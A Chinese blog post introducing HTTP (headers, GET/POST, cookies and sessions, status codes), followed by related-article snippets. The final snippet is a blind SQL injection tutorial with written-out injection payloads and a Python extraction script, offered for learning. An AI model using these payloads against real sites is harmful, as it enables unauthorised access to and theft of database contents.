初探HTTP

最新推荐文章于 2025-01-23 18:19:23 发布
原创 最新推荐文章于 2025-01-23 18:19:23 发布 · 281 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#HTTP

本文介绍了HTTP协议,它是应用层为浏览器和服务器通信设计的协议,基于TCP协议。阐述了HTTP首部的分类,常见请求方法GET和POST的区别,还说明了HTTP无状态但可通过cookie和session建立会话,最后介绍了HTTP状态码的分类及常见代码。

HTTP 是什么?

HTTP : HyperText Transfer Protocol 。根据字面意思我们可以翻译为超文本传输协议。

它是一种位于「应用层」,专门为 web浏览器 和 web服务器 之间通信的而设计的协议。因为网页上通常传输的是 HTML 这样的超媒体文档,所以被称超文本传输协议。

HTTP 是基于「 TCP协议」之上的,所以它也具有的 「 TCP协议」的特点:可靠,传输效率相对较低
HTTP基础概念

HTTP 首部

HTTP 首部可以分为 4 个部分:一般头、请求头、响应头、实体头。

我们可以在任意浏览器中「右键 —— 检查」查看服务器与浏览器之间的网络情况。(推荐 Firefox)
在这里插入图片描述
以百度为例,一般头里存放的是请求信息,主要包括:请求网址、请求方法、返回状态码、连接采用的协议等。

请求网址:https://www.baidu.com/
请求方法:GET
远程地址:180.101.49.11:443
状态码:
200
版本:HTTP/1.1
Referrer 政策:no-referrer-when-downgrade

而作为 web 开发,我们需要重点关注的是 request(请求头)、response(响应头)两部份。

request(请求头),会把客户端的信息放在里面发送给服务器。例如:可接收数据、接受编码格式、语言、连接是否保存、请求的主机域名(可以让多台服务器的任意一台响应)、浏览器信息、Cookie来源网址(防盗链)等。

Host: www.baidu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://www.baidu.com/
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Cookie: BAIDUID=03E141A2389016553988E825286E0A2F:FG=1;
1
User-Agent	
Mozilla/5.0 (Windows NT 10.0; …) Gecko/20100101 Firefox/67.0

response(响应头):服务器接受到请求根据需要发送数据给客户端。会包含:请求的结果(状态码)、返回数据的长度、编码格式、时间等

HTTP/1.1 200 OK
Content-Length: 74
Content-Type: text/plain; charset=UTF-8
Date: Sun, 14 Jul 2019 01:45:57 GMT

常见请求方法

常与后端打交道的两种请求方法有:get、post。

GET 方法,将请求的参数位于 URL 后,例如:https://www.sogou.com/web?query=123&_asf=www.sogou.com,请求的网址为 https://www.sogou.com/web,以「?」来分割请求网址和请求参数信息,query 为参数名称,123 为参数值,以等号来对应参数名称和值,多个参数之间以「&」区分。

POST 方法,将见于:表单提交,带有敏感信息的请求,所发送的数据隐藏在 HTTP 包中,不显式可见。

二者区别:

  • 传输数据方面:「GET 方法」通过 URL 传递数据,而 URL 的长度是有限制的,无法传输图片、视频等大数据。而「POST 方法」数据存在于 HTTP 包中,理论上不受限制。
  • 安全性方面:「GET 方法」数据显示在 URL 中,容易被窃取,而「POST 方法」不显式可见,更不易被窃取,相对安全。

HTTP 无状态,有会话

无状态:同一连接上的任意两个请求没有链接。服务器无法直接通过连接知道上一请求的状态。

HTTP 的解决,通过 cookie,来记录上一次请求的状态,服务器通过 cookie 告知上一请求的状态,与客户端建立会话。

cookie

  1. 由服务器建立,存储于客户端。
  2. 客户端每次请求 自动 将已有 Cookie 发送给客户端。例:Cookie: BAIDUID=03E141A2389016553988E825286E0A2F:FG=1
  3. 默认存储在内存中,随着浏览器的关闭而销毁。可以手动设置 Cookie 的存活时间(写入本地硬盘 ),例:Cache-Control: max-age= 300,单位为秒。
  4. 大小限制在 4KB。

由 cookie 写入本地硬盘引发的问题:

  1. 不安全性。黑客可以通过获取本地的 cookie 获得信息,本地文件可以人为修改。
  2. 存储数据量不足。随着 web服务的升级,会话所需要传递的数据远不止 4KB。

所以,cookie 仅用来存储一些不太重要的信息。

解决方案 session:

session 将数据存储在 服务器,客户端仅用 cookie 存储 session 的 id。

HTTP 状态码

HTTP 状态码可分为 5 种:

  1. 1XX。以 1 开头,表示 该响应尚未完成。常见的有:101,表示 HTTP 协议的切换。
  2. 2XX。以 2 开头,表示 成功响应。常见代码:200 OK,表示请求成功。
  3. 3XX。以 3 开头,表示重定向

常见代码:304:如果客户端发送了一个带条件的 GET
请求且该请求已被允许,而文档的内容(自上次访问以来或者根据请求的条件)并没有改变,则服务器应当返回这个状态码

  1. 4XX。以 4 开头,通常表示客户端错误。常见代码 404 ,表示客户端所请求的资源并未在服务器上找到。
    404
  2. 5XX。以 5 开头,通常表示服务端响应错误。常见代码 500,表示服务器运行出错。
    人为制造错误
    总结,1XX、2XX、3XX 都属于正常的响应,而 4XX、5XX 都是非正常响应,需要程序员去处理,不能直接将错误暴露给用户。

本篇文章,参考了 MDN官方文档,感兴趣的朋友可以自己去官网查看文档,也可以评论发表你的看法。

https跳转http源码和实例(C#)
12-14
https跳转http源码和实例(C#实现)
JSP和Servlet那些事儿系列--初探HTTP服务器
04-18
HTTP服务器接收来自客户端(如浏览器)的HTTP请求返回相应的HTTP响应。这些请求可能包括GET、POST、PUT、DELETE等方法,用于获取资源、提交数据或修改服务器上的信息。服务器接收到请求后,解析请求头请求体,...
https自动跳转
hsjdhkdd的博客
01-18 326
# 配置多个ssl加密虚拟主机时,红框以上的内容留一份就够了,多了会冲突 ssl加密虚拟主机自动转发 添加以下内容在第一个80端口的虚拟主机配置文件内 RewriteEngine On RewriteCond %{HTTP_HOST} www.linux.com [NC] RewriteRule ^/ https://www.linux.com [L] # %{HTTP_HOST} 调用访问的主机名 # [NC]忽略大小写 # [L]立即响应 #..
https 跳转 http referrer_涨知识:HTTP 规范中的暗坑知多少?
weixin_39563132的博客
11-23 7776
HTTP 协议可以说是开发者最熟悉的一个网络协议,「简单易懂」和「易于扩展」两个特点让它成为应用最广泛的应用层协议。虽然有诸多的优点,但是在协议定义时因为诸多的博弈和限制,还是隐藏了不少暗坑,让人一不小心就会陷入其中。本文总结了 HTTP 规范中常见的几个暗坑,希望大家开发中有意识的规避它们,提升开发体验。1.RefererHTTP 标准把 Referrer 写成 Referer(少些了一个 r)...
最常见的 2 种 Nginx 中 HTTP 跳转 HTTPS 场景
easylife206的专栏
09-06 2259
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !Nginx: 最常见的 2 中 http to https 跳转场景原文链接:https://typonotes.com/posts/2023/08/28/nginx-http-https-redirect-scenarios/1. Nginx 上层无代理, 用户直接访问这种方式比较简单。我们对 http 和 ht...
Nginx配置https链接跳转http
u014650759的专栏
08-01 2739
这里需要注意的是,location的路径最后记得加上/,因为我的项目中实际就是域名+index,通常理解的话路径最后没必要加上/,实际不加会有问题,尝试了几次的经验教训。为了解决这种情况,需要进行Nginx配置,浏览器以https进行访问时,自动跳转访问http类型的链接。由于项目中实际用的http进行发布访问,网址链接没有指定为http类型,导致某些场景下打开链接是https方式进行访问,就会显示404错误,没法正常访问。
ReactNative初探
01-27
React Native 初探意味着我们将探索这个框架的基本概念、优势和挑战,以及如何开始构建一个简单的RN应用。 React Native的核心理念是“Learn once, write anywhere”,这意味着开发者可以使用相同的JavaScript和...
duilib初探
08-24
### Duilib初探 #### 一、Duilib简介与特性 Duilib是一个广泛应用于桌面应用程序开发的界面库,尤其在中国的软件开发社区中备受青睐。它具有以下显著特点: 1. **开源性**:Duilib作为一款开源软件,开发者可以...
初探nodeJS
10-20
创建一个简单的HTTP服务器需要使用Node.js的http模块。通过引入http模块调用createServer方法可以创建一个新的服务器实例。服务器通过监听请求事件来响应客户端的请求,例如,可以通过writeHead方法设置HTTP响应头...
grizzly初探
04-20
**Grizzly 框架初探** Grizzly 是一个由 Sun Microsystems 开发维护的开源框架,主要用于构建高性能、轻量级的网络应用服务器。它是一个 Java NIO(非阻塞 I/O)库,用于创建高发、低延迟的网络服务。在 Java ...
网站http自动跳转https方法教程
SSL加密技术
08-22 9662
Apache服务器: 如果需要整站跳转,则在网站的配置文件的Directory标签内,键入以下内容: RewriteEngine on RewriteCond %{SERVER_PORT} !^443$ RewriteRule ^(.*)?$ https://%{SERVER_NAME}/$1 [L,R] 如果对某个目录做https强制跳转,则复制以下代码: RewriteEngine...
http怎么做自动跳转https
weixin_33884611的博客
06-24 225
2019独角兽企业重金招聘Python工程师标准>>> ...
java redirect https跳转http问题
weixin_49416704的博客
01-23 430
这个主要是通过访问tomcat的请求head项来决定的,默认是http协议,域名是通过读取host地址,默认host中不包括访问端口。因为最近没有时间,就不排版了,调试这个问题已经浪费了不少时间。3. proxy_redirect修改response中的location中的协议httphttps外网访问的协议。通过https访问到nginx,通过nginx proxy_pass 到http的tomcat。实现流程:根据nginx的不同执行阶段,来完成Location httphttps。
HTTPS重定向到HTTP
杨军的博客
09-29 2万+
一.场景:   在企业内网应用,以及一些安全要求不高的网站会有一些https转http的需求,例如只是登陆https协议,其他请求都是走http协议,走http协议不再需要重新登陆一次。   二.解决方案   Cookie时效:   当cookie是secure的情况下,当服务器从https协议重定向到http协议后,这样的cookie就不会随请求发送到服务器。  当co
通过nginx将https协议反向代理到http协议请求
qq_1763467007的博客
09-05 2万+
目前一个系统仅支持https协议访问,因后端服务基于ssl协议,前端在请求是也需要支持ssl协议的https请求来访问。目前的代理服务器是nginx,现在想要==通过http访问系统==,需通过nginx的**反向代理**或者**重定向方式**将https请求代理为http请求。可实现的做法有如下几种: >1、使后端开放两种端口,一个端口支持https协议访问,一个端口支持http协议访问,之后前端请求通过nginx代理,同时nginx也开放两个端口(比如80端口作为http访问,443端口作为https访
http怎么做自动跳转https?(各种版本)
第7维度 - 日常笔记
07-25 7630
APache 版本 1、如果需要整站跳转,则在网站的配置文件的标签内,键入以下内容: RewriteEngine onRewriteCond %{SERVER_PORT} !^443$RewriteRule ^(.*)?$ https://%{SERVER_NAME}/$1 [L,R] 2、如果对某个目录做https强制跳转,则复制以下代码: RewriteEngine onRewrite
用 Nginx 实现 https 转 http
热门推荐
lvye1221的专栏
12-23 6万+
缘由当前公司服务器已经采用 http 协议的方式部署成功,可 App Store 要求必须采用 https 协议,那么,能否在不改变公司服务器代码的情况下,实现 https 的要求呢?答案是肯定的,采用 Nginx 反向代理实现(以代理服务器来接受internet上的连接请求,然后将请求转发给内部网络上的服务器)。
java后台系统登陆重定向访问https跳转到http的解决方法
w2393040183的专栏
07-16 4515
1、问题描述 开发了一个web后台系统,nginx配置了证书,开启443端口,支持https请求;但是后台系统中使用了相对路径的重定向,导致登陆重定向报错; 备注:nginx配置了证书,支持443,但是不支持80端口;后端只处理http请求;...
301跳转 https_http跳转https和https跳转http的两种301重定向代码
weixin_39974223的博客
12-21 873
很多博主看到有主机商提供免费的DV SSL证书,也喜欢尝新鲜把自己的独立博客网站改为https访问,显得很有技术范儿,当然既有一定的安全性也有利于搜索引擎收录。下面这rewrite规则是重定向到https。将 http 访问强制重定向至 https,代码如下:RewriteEngine onRewriteBase /RewriteCond %{SERVER_PORT} !^443$RewriteR...
布尔盲注初探
最新发布
09-07
布尔盲注是 SQL 注入的一种类型,在无法从页面获取明确的错误信息和查询结果的情况下,通过构造特定的 SQL 语句,根据页面返回的不同状态(如页面正常显示或报错)来判断条件是否成立,逐步获取数据库中的信息。 ### 布尔盲注适用场景 当注入点没有明显的错误信息回显,也不会直接返回查询结果时,布尔盲注就成为一种有效的获取数据库信息的方法。例如在某些 Web 应用中,页面仅返回“正常访问”和“访问异常”两种状态,无法直接看到数据库查询结果,此时可尝试使用布尔盲注。 ### 布尔盲注常用函数及原理 - **length()函数**:用于获取字符串的长度。例如 `length((select database()))` 可获取当前数据库名的长度。通过构造不同长度的判断语句,根据页面返回状态确定数据库名的实际长度。如 `/?id=1' and length((select database()))=8--+`,若页面正常显示,则表示当前数据库名长度为 8;若页面异常,则长度不是 8,继续尝试其他长度。 - **ascii()函数**:将字符转换为对应的 ASCII 码。结合 `substr()` 函数可逐个字符获取数据库名、表名、字段名等信息。`substr(str, pos, len)` 函数用于截取字符串 `str` 从位置 `pos` 开始长度为 `len` 的子字符串。例如 `ascii(substr((select database()),1,1))` 可获取当前数据库名第一个字符的 ASCII 码。通过构造不同 ASCII 码的判断语句,根据页面返回状态确定该字符。如 `/?id=1' and ascii(substr((select database()),1,1))=115--+`,若页面正常显示,则表示数据库名第一个字符的 ASCII 码为 115,对应的字符为 `'s'`;若页面异常,则继续尝试其他 ASCII 码。 ### 布尔盲注步骤 1. **判断数据库名长度**:构造类似 `/?id=1' and length((select database()))=8--+` 的语句,通过不断改变长度,根据页面返回状态确定数据库名的长度。 2. **获取数据库名**:在确定数据库名长度后,使用 `ascii(substr())` 函数逐个字符获取数据库名。例如 `/?id=1' and ascii(substr((select database()),1,1))=115--+` 用于判断数据库名第一个字符,依次类推,获取整个数据库名。 3. **获取表名**:构造 `/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102--+` 语句,通过改变 `limit` 的和 ASCII 码,逐个获取数据库中的表名。 4. **获取字段名**:在确定表名后,构造 `/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='表名' limit 1,1),1,1))=102--+` 语句,获取表中的字段名。 5. **获取字段**:构造 `/?id=1' and ascii(substr((select 字段 from 表 limit 1,1),1,1))=1--+` 语句,获取字段的。 ### 布尔盲注示例代码(Python 实现) ```python import requests url = 'http://example.com/?id=' # 判断数据库名长度 def get_db_length(): length = 1 while True: payload = f"1' and length((select database()))={length}--+" response = requests.get(url + payload) if response.status_code == 200: return length length += 1 # 获取数据库名 def get_db_name(): db_length = get_db_length() db_name = '' for i in range(1, db_length + 1): for ascii_code in range(32, 127): payload = f"1' and ascii(substr((select database()),{i},1))={ascii_code}--+" response = requests.get(url + payload) if response.status_code == 200: db_name += chr(ascii_code) break return db_name print("数据库名长度:", get_db_length()) print("数据库名:", get_db_name()) ``` ### 注意事项 - 布尔盲注是一种比较耗时的注入方法,因为需要逐个字符、逐个 ASCII 码进行尝试。 - 在实际应用中,要确保注入操作符合法律法规和道德规范,仅在合法授权的测试环境中进行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值